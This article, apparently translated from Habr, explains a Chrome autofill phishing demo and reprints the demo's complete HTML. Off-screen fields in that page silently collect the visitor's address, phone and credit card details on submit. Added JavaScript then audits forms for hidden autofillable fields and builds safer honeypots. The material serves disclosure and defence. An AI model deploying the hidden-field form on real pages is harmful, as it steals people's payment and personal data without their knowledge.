
Phishing via autocomplete in Chrome (demo)


It has long been known that the browser's autofill feature is an excellent attack vector. The browser readily hands the information it has saved for filling in forms to anyone who asks for it, even when the form fields are not visible. And the data stored in the autofill profile can be confidential: the user's home address, for example, or even bank card details. A person does not necessarily want to share such information simply by entering an e-mail address for some mailing list, yet with Chrome they will have to (Firefox promises a comparable feature in the near future, but it does not work yet).

In the browser, the feature works as follows: when you start filling in one of the fields of a large form, the profile offers to fill in that field and the other fields automatically. If the user agrees, the fields are filled in and highlighted in yellow.

For most users, autofill is a convenient feature that saves the time of manually filling out 10, 20 or more fields. Few of them realize that by asking the browser to fill in a single field, they automatically agree to hand over all the others to the server as well. But that is how it works.

Finnish web developer Viljami Kuosmanen wrote a simple demo that clearly demonstrates how phishing via autofill works.
The demo is a simple page with only two fields: name and e-mail address. As usual, as soon as you start typing your name, the browser offers its autofill profiles and you choose one. After that, both fields are filled in automatically, name and e-mail address, and, as expected, they are highlighted in yellow.

Next, click the "Submit" button and look at the full set of data from the autofill profile that the browser sent to the remote host. Impressive.



Phishing works best in Google Chrome, where the transfer of information happens completely unnoticed by the user. In Safari, the user can at least see what extra information is being sent to the host. In Firefox, the user has to right-click manually on each field they want to autofill, so the phishing does not work at all. Perhaps the Firefox developers decided to sacrifice user convenience for added security when activating autofill profiles. Maybe in vain: history shows that when choosing between convenience and security, most users choose convenience.

Firefox developers have not yet finished building a feature as convenient as autofill profiles, but they will certainly implement it in the future, modelled on Chrome.

In Opera, apparently, autofill profiles also hand over the information unnoticed by the user, just as in Chrome.

The source code is published on GitHub, so if you wish you can set up such a demo on your own website. Enthusiasts are now making small changes to the code, but for now the phishing form looks like this:

index.html

```html
<!doctype html>
<html>
<head>
  <title>Browser Autofill Phishing</title>
</head>
<body>
  <form action="https://httpbin.org/post" method="post">
    <!-- The only two fields the visitor actually sees -->
    <p>
      <label for="name">Name</label><br>
      <input id="name" name="name" type="text" placeholder="Your Name">
    </p>
    <p>
      <label for="email">Email</label><br>
      <input id="email" name="email" type="email" placeholder="Your Email">
    </p>
    <p>
      <input type="submit" value="Submit">
    </p>
    <!-- Every paragraph below is pushed 500px past the left edge of the viewport,
         so its field is invisible but still part of the form and still autofilled -->
    <p style="margin-left:-500px">
      <input id="phone" name="phone" type="text" placeholder="Your Phone">
    </p>
    <p style="margin-left:-500px">
      <input id="organization" name="organization" type="text" placeholder="Your Organization">
    </p>
    <p style="margin-left:-500px">
      <input id="address" name="address" type="text" placeholder="Your Address">
    </p>
    <p style="margin-left:-500px">
      <input id="postal" name="postal" type="text" placeholder="Your Postal Code">
    </p>
    <p style="margin-left:-500px">
      <input id="city" name="city" type="text" placeholder="Your City">
    </p>
    <p style="margin-left:-500px">
      <select name="country">
        <option value=""></option><option value="FI">Finland</option><option value="AF">Afghanistan</option><option value="AX">Åland Islands</option><option value="AL">Albania</option><option value="DZ">Algeria</option><option value="AS">American Samoa</option><option value="AD">Andorra</option><option value="AO">Angola</option><option value="AI">Anguilla</option><option value="AQ">Antarctica</option><option value="AG">Antigua & Barbuda</option><option value="AR">Argentina</option><option value="AM">Armenia</option><option value="AW">Aruba</option><option value="AC">Ascension Island</option><option value="AU">Australia</option><option value="AT">Austria</option><option value="AZ">Azerbaijan</option>
        <option value="BS">Bahamas</option><option value="BH">Bahrain</option><option value="BD">Bangladesh</option><option value="BB">Barbados</option><option value="BY">Belarus</option><option value="BE">Belgium</option><option value="BZ">Belize</option><option value="BJ">Benin</option><option value="BM">Bermuda</option><option value="BT">Bhutan</option><option value="BO">Bolivia</option><option value="BA">Bosnia & Herzegovina</option><option value="BW">Botswana</option><option value="BV">Bouvet Island</option><option value="BR">Brazil</option><option value="IO">British Indian Ocean Territory</option><option value="VG">British Virgin Islands</option><option value="BN">Brunei</option><option value="BG">Bulgaria</option><option value="BF">Burkina Faso</option><option value="BI">Burundi</option>
        <option value="KH">Cambodia</option><option value="CM">Cameroon</option><option value="CA">Canada</option><option value="CV">Cape Verde</option><option value="BQ">Caribbean Netherlands</option><option value="KY">Cayman Islands</option><option value="CF">Central African Republic</option><option value="TD">Chad</option><option value="CL">Chile</option><option value="CN">China</option><option value="CX">Christmas Island</option><option value="CC">Cocos [Keeling] Islands</option><option value="CO">Colombia</option><option value="KM">Comoros</option><option value="CD">Congo [DRC]</option><option value="CG">Congo [Republic]</option><option value="CK">Cook Islands</option><option value="CR">Costa Rica</option><option value="CI">Côte d'Ivoire</option><option value="HR">Croatia</option><option value="CW">Curaçao</option><option value="CY">Cyprus</option><option value="CZ">Czech Republic</option>
        <option value="DK">Denmark</option><option value="DJ">Djibouti</option><option value="DM">Dominica</option><option value="DO">Dominican Republic</option><option value="EC">Ecuador</option><option value="EG">Egypt</option><option value="SV">El Salvador</option><option value="GQ">Equatorial Guinea</option><option value="ER">Eritrea</option><option value="EE">Estonia</option><option value="ET">Ethiopia</option><option value="FK">Falkland Islands [Islas Malvinas]</option><option value="FO">Faroe Islands</option><option value="FJ">Fiji</option><option value="FI">Finland</option><option value="FR">France</option><option value="GF">French Guiana</option><option value="PF">French Polynesia</option><option value="TF">French Southern Territories</option>
        <option value="GA">Gabon</option><option value="GM">Gambia</option><option value="GE">Georgia</option><option value="DE">Germany</option><option value="GH">Ghana</option><option value="GI">Gibraltar</option><option value="GR">Greece</option><option value="GL">Greenland</option><option value="GD">Grenada</option><option value="GP">Guadeloupe</option><option value="GU">Guam</option><option value="GT">Guatemala</option><option value="GG">Guernsey</option><option value="GN">Guinea</option><option value="GW">Guinea-Bissau</option><option value="GY">Guyana</option><option value="HT">Haiti</option><option value="HM">Heard & McDonald Islands</option><option value="HN">Honduras</option><option value="HK">Hong Kong</option><option value="HU">Hungary</option>
        <option value="IS">Iceland</option><option value="IN">India</option><option value="ID">Indonesia</option><option value="IR">Iran</option><option value="IQ">Iraq</option><option value="IE">Ireland</option><option value="IM">Isle of Man</option><option value="IL">Israel</option><option value="IT">Italy</option><option value="JM">Jamaica</option><option value="JP">Japan</option><option value="JE">Jersey</option><option value="JO">Jordan</option><option value="KZ">Kazakhstan</option><option value="KE">Kenya</option><option value="KI">Kiribati</option><option value="XK">Kosovo</option><option value="KW">Kuwait</option><option value="KG">Kyrgyzstan</option>
        <option value="LA">Laos</option><option value="LV">Latvia</option><option value="LB">Lebanon</option><option value="LS">Lesotho</option><option value="LR">Liberia</option><option value="LY">Libya</option><option value="LI">Liechtenstein</option><option value="LT">Lithuania</option><option value="LU">Luxembourg</option><option value="MO">Macau</option><option value="MK">Macedonia [FYROM]</option><option value="MG">Madagascar</option><option value="MW">Malawi</option><option value="MY">Malaysia</option><option value="MV">Maldives</option><option value="ML">Mali</option><option value="MT">Malta</option><option value="MH">Marshall Islands</option><option value="MQ">Martinique</option><option value="MR">Mauritania</option><option value="MU">Mauritius</option><option value="YT">Mayotte</option><option value="MX">Mexico</option><option value="FM">Micronesia</option><option value="MD">Moldova</option><option value="MC">Monaco</option><option value="MN">Mongolia</option><option value="ME">Montenegro</option><option value="MS">Montserrat</option><option value="MA">Morocco</option><option value="MZ">Mozambique</option><option value="MM">Myanmar [Burma]</option>
        <option value="NA">Namibia</option><option value="NR">Nauru</option><option value="NP">Nepal</option><option value="NL">Netherlands</option><option value="NC">New Caledonia</option><option value="NZ">New Zealand</option><option value="NI">Nicaragua</option><option value="NE">Niger</option><option value="NG">Nigeria</option><option value="NU">Niue</option><option value="NF">Norfolk Island</option><option value="MP">Northern Mariana Islands</option><option value="NO">Norway</option><option value="OM">Oman</option><option value="PK">Pakistan</option><option value="PW">Palau</option><option value="PS">Palestine</option><option value="PA">Panama</option><option value="PG">Papua New Guinea</option><option value="PY">Paraguay</option><option value="PE">Peru</option><option value="PH">Philippines</option><option value="PN">Pitcairn Islands</option><option value="PL">Poland</option><option value="PT">Portugal</option><option value="PR">Puerto Rico</option><option value="QA">Qatar</option><option value="RE">Réunion</option><option value="RO">Romania</option><option value="RU">Russia</option><option value="RW">Rwanda</option>
        <option value="WS">Samoa</option><option value="SM">San Marino</option><option value="ST">São Tomé & Príncipe</option><option value="SA">Saudi Arabia</option><option value="SN">Senegal</option><option value="RS">Serbia</option><option value="SC">Seychelles</option><option value="SL">Sierra Leone</option><option value="SG">Singapore</option><option value="SX">Sint Maarten</option><option value="SK">Slovakia</option><option value="SI">Slovenia</option><option value="SB">Solomon Islands</option><option value="SO">Somalia</option><option value="ZA">South Africa</option><option value="GS">South Georgia & South Sandwich Islands</option><option value="KR">South Korea</option><option value="SS">South Sudan</option><option value="ES">Spain</option><option value="LK">Sri Lanka</option><option value="BL">St. Barthélemy</option><option value="SH">St. Helena</option><option value="KN">St. Kitts & Nevis</option><option value="LC">St. Lucia</option><option value="MF">St. Martin</option><option value="PM">St. Pierre & Miquelon</option><option value="VC">St. Vincent & Grenadines</option><option value="SR">Suriname</option><option value="SJ">Svalbard & Jan Mayen</option><option value="SZ">Swaziland</option><option value="SE">Sweden</option><option value="CH">Switzerland</option>
        <option value="TW">Taiwan</option><option value="TJ">Tajikistan</option><option value="TZ">Tanzania</option><option value="TH">Thailand</option><option value="TL">Timor-Leste</option><option value="TG">Togo</option><option value="TK">Tokelau</option><option value="TO">Tonga</option><option value="TT">Trinidad & Tobago</option><option value="TA">Tristan da Cunha</option><option value="TN">Tunisia</option><option value="TR">Turkey</option><option value="TM">Turkmenistan</option><option value="TC">Turks & Caicos Islands</option><option value="TV">Tuvalu</option><option value="UM">US Outlying Islands</option><option value="VI">US Virgin Islands</option><option value="UG">Uganda</option><option value="UA">Ukraine</option><option value="AE">United Arab Emirates</option><option value="GB">United Kingdom</option><option value="US">United States</option><option value="UY">Uruguay</option><option value="UZ">Uzbekistan</option>
        <option value="VU">Vanuatu</option><option value="VA">Vatican City</option><option value="VE">Venezuela</option><option value="VN">Vietnam</option><option value="WF">Wallis & Futuna</option><option value="EH">Western Sahara</option><option value="YE">Yemen</option><option value="ZM">Zambia</option><option value="ZW">Zimbabwe</option>
      </select>
    </p>
    <!-- Card number, expiry month/year and CVV, also off-screen -->
    <p style="margin-left:-500px">
      <input type="text" name="cc_number">
    </p>
    <p style="margin-left:-500px">
      <select name="cc_month" id="cc_month">
        <option value="01">01</option><option value="02">02</option><option value="03">03</option><option value="04">04</option><option value="05">05</option><option value="06">06</option><option value="07">07</option><option value="08">08</option><option value="09">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option>
      </select>
      <select name="cc_year" id="cc_year">
        <option>2017</option><option>2018</option><option>2019</option><option>2020</option><option>2021</option><option>2022</option><option>2023</option><option>2024</option><option>2025</option><option>2026</option><option>2027</option><option>2028</option><option>2029</option><option>2030</option><option>2031</option><option>2032</option>
      </select>
    </p>
    <p style="margin-left:-500px">
      <input type="text" id="cc_cvv" name="cc_cvv">
    </p>
  </form>
  <script type="text/javascript">
    function onchangehandler(event) {
      // Print out its value. Could be a web request without users' knowledge.
      console.log(event.target.name + ": " + event.target.value);
    }
    // Apply 'input' event to every input element
    document.querySelectorAll('input').forEach(function(input) {
      input.addEventListener('input', onchangehandler);
    });
  </script>
</body>
</html>
```

From the source code of index.html it is immediately clear that there are a dozen more input fields hidden on the page, all styled with "margin-left: -500px": telephone, place of work, address, postal code, city, country, the credit card's expiry month and year, and the credit card number.

The user does not see them because of the "margin-left: -500px", but the browser quietly fills in every one of these fields and transmits the data.

It is easy to see that such an attack can be used to find out a Chrome user's credit card number and other information about them, provided they activate autofill on your page.
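The demo's extra fields are hidden only visually, which is exactly what a page reviewer or a browser extension can check for before trusting a form. The following is an added example and is not part of the original article or of Kuosmanen's demo: it classifies each field of a form as visible or hidden (off-screen, zero-sized, display:none, visibility:hidden, opacity:0) and flags the hidden ones whose names look like autofill targets. The field-name pattern, the `auditFields`/`auditForm` helper names and the sample field geometry (modelled on the demo's `margin-left:-500px` paragraphs) are my own assumptions.

```javascript
// Added example (not from the article or the demo): audit a form for input
// fields a user cannot see but that the browser's autofill would still fill
// in and submit. The hidden-field test is a pure function over plain
// descriptors so it runs outside a browser; auditForm() wraps it with real
// DOM calls (getComputedStyle / getBoundingClientRect) when a document exists.

// Field names that autofill heuristics recognise; constructed from the
// field names used in the demo form (assumption, not a browser's real list).
const AUTOFILL_LIKE = /^(name|email|phone|tel|organization|address|street|postal|zip|city|country|cc_|card)/i;

// rect: {left, top, right, bottom}; style: subset of computed style;
// viewport: {width, height}. Returns true when the field is not visible.
function isVisuallyHidden(rect, style, viewport) {
  if (style.display === 'none' || style.visibility === 'hidden') return true;
  if (parseFloat(style.opacity) === 0) return true;
  if (rect.right - rect.left <= 0 || rect.bottom - rect.top <= 0) return true;
  // Entirely outside the viewport, e.g. the demo's margin-left:-500px paragraphs.
  if (rect.right <= 0 || rect.bottom <= 0) return true;
  if (rect.left >= viewport.width || rect.top >= viewport.height) return true;
  return false;
}

// fields: [{name, type, autocomplete, rect, style}] -> list of hidden fields,
// each marked with whether its name or autocomplete attribute invites autofill.
function auditFields(fields, viewport) {
  const hidden = [];
  for (const f of fields) {
    // type=hidden is never autofilled and submit buttons carry no user data.
    if (f.type === 'hidden' || f.type === 'submit') continue;
    if (isVisuallyHidden(f.rect, f.style, viewport)) {
      hidden.push({
        name: f.name,
        autofillRisk: AUTOFILL_LIKE.test(f.name) ||
          Boolean(f.autocomplete && f.autocomplete !== 'off'),
      });
    }
  }
  return hidden;
}

// Browser-only wrapper: collect the descriptors from a live <form> element.
function auditForm(form) {
  const vp = { width: window.innerWidth, height: window.innerHeight };
  const fields = Array.from(form.querySelectorAll('input, select, textarea')).map((el) => ({
    name: el.name,
    type: el.type,
    autocomplete: el.getAttribute('autocomplete'),
    rect: el.getBoundingClientRect(),
    style: window.getComputedStyle(el),
  }));
  return auditFields(fields, vp);
}

// Constructed sample modelled on the demo: two visible inputs, the rest
// shifted 500px to the left so that their right edge is negative, plus one
// display:none field with a neutral name and autocomplete="off".
const VIEWPORT = { width: 1280, height: 800 };
const SHOWN = { display: 'block', visibility: 'visible', opacity: '1' };
function rect(left, top, w, h) { return { left, top, right: left + w, bottom: top + h }; }
const SAMPLE_FIELDS = [
  { name: 'name', type: 'text', autocomplete: null, rect: rect(8, 40, 180, 24), style: SHOWN },
  { name: 'email', type: 'email', autocomplete: null, rect: rect(8, 90, 180, 24), style: SHOWN },
  { name: 'phone', type: 'text', autocomplete: null, rect: rect(-492, 190, 180, 24), style: SHOWN },
  { name: 'cc_number', type: 'text', autocomplete: null, rect: rect(-492, 540, 180, 24), style: SHOWN },
  { name: 'cc_cvv', type: 'text', autocomplete: null, rect: rect(-492, 640, 180, 24), style: SHOWN },
  { name: 'comment', type: 'text', autocomplete: 'off', rect: rect(8, 700, 180, 24), style: { ...SHOWN, display: 'none' } },
];

function demo() {
  return auditFields(SAMPLE_FIELDS, VIEWPORT);
}

if (typeof document !== 'undefined') {
  document.querySelectorAll('form').forEach((form) => console.log(auditForm(form)));
} else {
  console.log(demo());
}
```

Loaded in a page, `auditForm()` works from the real computed style and bounding rectangles; run under Node, the constructed sample reports the three off-screen card and phone fields as autofill risks and the display:none `comment` field as hidden but harmless, while `name` and `email` are not reported. The check is purely geometric: a legitimate bot-trap field is flagged too, which is the point of auditing a form before trusting it.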

Perhaps the attack works not only in Chrome but also in other browsers built on its code base, for example Yandex Browser. That browser used to leak all of its synchronization data to anyone via a simple CSRF bug: not only form-fill information but also passwords, bookmarks, browsing history and so on. Compared to that bug, phishing via autofill in Chrome is a childish prank. The vulnerability was fixed only in May 2016.

In general, experts have long warned about the dangers of autofill profiles. The warnings began right after the feature appeared in Chrome in 2013. Since then, browser developers have failed to implement competent protection against autofilling hidden fields.

Incidentally, a similar trick with filling in invisible fields has long been used to identify bots: normal users do not fill in fields shifted beyond the visible area of the screen, while bots do. The Finnish programmer Viljami Kuosmanen simply applied the same trick, only not against bots but against people.
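The bot-trap version of the trick has a failure mode that follows directly from the demo: if the invisible field is named like something the browser knows how to fill (phone, address, cc_number), autofill will fill it for a real person and the site will reject a human as a bot. The following is an added example, not from the article or from any library: a honeypot field generator that refuses autofill-like names and sets autocomplete="off", plus the server-side check on the submitted body. The AUTOFILL_PRONE list, the `hp_extra` field name and the sample submissions are constructed.

```javascript
// Added example (not from the article): the hidden-field bot trap done so
// that a browser's autofill does not turn real users into "bots".

// Names that autofill heuristics recognise; constructed from the field names
// in the demo form (assumption, not any browser's actual matching rules).
const AUTOFILL_PRONE = ['name', 'email', 'phone', 'tel', 'organization', 'address',
  'postal', 'zip', 'city', 'country', 'cc_number', 'cc_month', 'cc_year', 'cc_cvv'];

// A honeypot must not look like any of the fields above, or autofill fills it.
function isAutofillProne(fieldName) {
  const n = fieldName.toLowerCase();
  return AUTOFILL_PRONE.some((p) => n === p || n.includes(p));
}

// Markup for the trap field. autocomplete="off" and tabindex="-1" keep the
// browser's autofill and keyboard users out of it; aria-hidden keeps screen
// readers from announcing it. Refuses names that autofill would recognise.
function honeypotMarkup(fieldName) {
  if (isAutofillProne(fieldName)) {
    throw new Error('honeypot "' + fieldName + '" looks like an autofillable field; real users would be flagged');
  }
  return '<p style="position:absolute;left:-10000px" aria-hidden="true">' +
    '<label for="' + fieldName + '">Leave this field empty</label>' +
    '<input id="' + fieldName + '" name="' + fieldName + '" type="text" autocomplete="off" tabindex="-1">' +
    '</p>';
}

// Server-side decision on a parsed POST body (object of field name -> value):
// a non-empty trap field means something other than a person filled the form.
function classifySubmission(body, honeypotName) {
  const trap = body[honeypotName];
  if (trap !== undefined && String(trap).trim() !== '') {
    return { verdict: 'bot', reason: 'hidden field "' + honeypotName + '" was filled' };
  }
  return { verdict: 'human', reason: 'honeypot empty' };
}

// Constructed sample submissions.
const HUMAN_POST = { name: 'Viljami', email: 'v@example.com', hp_extra: '' };
const BOT_POST = { name: 'x', email: 'x@example.com', hp_extra: 'http://spam.example' };
// What the demo shows: with a trap named "phone", Chrome fills it for a human too.
const AUTOFILLED_HUMAN_POST = { name: 'Viljami', email: 'v@example.com', phone: '+358 00 0000000' };

console.log(honeypotMarkup('hp_extra'));
console.log(classifySubmission(HUMAN_POST, 'hp_extra'));
console.log(classifySubmission(BOT_POST, 'hp_extra'));
console.log(classifySubmission(AUTOFILLED_HUMAN_POST, 'phone')); // the false positive
```

The last call shows the failure mode: the same check that correctly flags the bot also flags a real user whose browser autofilled a badly named trap, which is why `honeypotMarkup` refuses such names outright.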

To protect yourself from the transfer of unwanted data, simply disable autofill profiles in the browser (they are enabled by default).

Source: https://habr.com/ru/post/357670/

